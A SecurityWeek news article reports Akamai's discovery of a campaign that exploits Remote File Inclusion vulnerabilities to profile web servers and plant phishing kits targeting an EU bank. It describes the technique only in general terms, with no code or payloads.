Security Experts:

Connect with us

Hi, what are you looking for?



Campaign Leverages RFI Attacks to Deploy Phishing Kits

A recently detected series of targeted attacks is attempting to exploit Remote File Inclusion (RFI) vulnerabilities to deploy phishing kits, Akamai has discovered. 

A recently detected series of targeted attacks is attempting to exploit Remote File Inclusion (RFI) vulnerabilities to deploy phishing kits, Akamai has discovered. 

RFI attacks attempt to exploit unchecked or improperly validated inclusion functions within vulnerable applications or websites. Most of these attacks target PHP, but these vulnerabilities can also be found in Java, ASP, and elsewhere.

Once an RFI attack is successful, the server would deliver the content of the attacker-controlled externally-called file, and this is what was happening as part of the recently discovered attacks as well, Akamai’s Larry Cashdollar reveals

RFI attacks, the security researcher explains, could also lead to code execution, Cross Site Scripting (XSS), Denial of Service (DoS), or sensitive information disclosure.

The security researcher observed the attack on his own website, where server logs revealed GET requests linking to a text file, along with requests attempting to include a remote shell into the application running on the website. 

The code in the text file was designed to check whether the server was vulnerable to RFI. If so, the context of the $SERVER_ADMIN variable would be sent back to the attacker.

The file also included a call to another external txt file, which included some information about the attacker, such as their email address, the fact they favor Portuguese for variable names ($assunto), and confirmation that they are profiling servers (it would gather information on what user HTTP is running under on the server, such as Apache or Root). 

The researcher also noticed a request to a different text file from the same domain, which contained the necessary code to generate a phishing website targeting a well-known bank in the European Union.

“The reason for [using] text files is due to their ease of use. The text files can be remotely included into vulnerable PHP web pages via RFI and executed. However, they’re also easy to edit and manage, which gives the attacker a bit of flexibility,” the researcher notes. 

If the phishing kit is successfully deployed and users fall victim to it, harvested credentials are sent back to the attacker via email, as revealed by a configuration file that also included code for basic logging (counting the number of successful attacks vs. the number of page visits).

The investigation also led to the discovery of an html file used as a landing page, to initiate the final step in the phishing campaign and redirect the victim to a secondary domain where the phishing kit targeting the EU bank is hosted.

“The RFI attempts recorded in my logs were tailored to the page being tested. If the website being targeted uses form_id= for example, then the requests will match that instead of the generic (and commonly used) page_id= or page=. This tells us the attacker is likely parsing the HTML, and examining the variables being sent to via form to the backend,” Cashdollar notes. 

The use of RFI allows the attacker to remain undetected, as there are tools to scan for websites that could be vulnerable, record them to a list, and then work off that list, at a slow pace. Unless the server admin is watching logs, a successful attack could remain undetected for long. The attacker could also install a crypto miner or other means to monetize their access to the system, instead of a phishing kit. 

Related: Cybercriminals Using GitHub to Host Phishing Kits

Related: Phishers Serve Fake Login Pages via Google Translate

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Expert Insights

Related Content


The North Korean APT tracked as TA444 is either moonlighting from its previous primary purpose, expanding its attack repertoire, or is being impersonated by...


The UK’s NCSC has issued a security advisory to warn about spearphishing campaigns conducted by two unrelated Russian and Iranian hacker groups.

Application Security

Electric car maker Tesla is using the annual Pwn2Own hacker contest to incentivize security researchers to showcase complex exploit chains that can lead to...


The Single Most Important Part of Dealing with a Phishing Attack is Preparing for the Attack Before it Actually Happens.


The easiest way for a cyber-attacker to gain access to sensitive data is by compromising an end user’s identity and credentials. Things get even...

Application Security

Software maker Adobe on Tuesday released security patches for 29 documented vulnerabilities across multiple enterprise-facing products and warned that hackers could exploit these bugs...

Application Security

Fortinet on Monday issued an emergency patch to cover a severe vulnerability in its FortiOS SSL-VPN product, warning that hackers have already exploited the...

Application Security

Password management firm LastPass says the hackers behind an August data breach stole a massive stash of customer data, including password vault data that...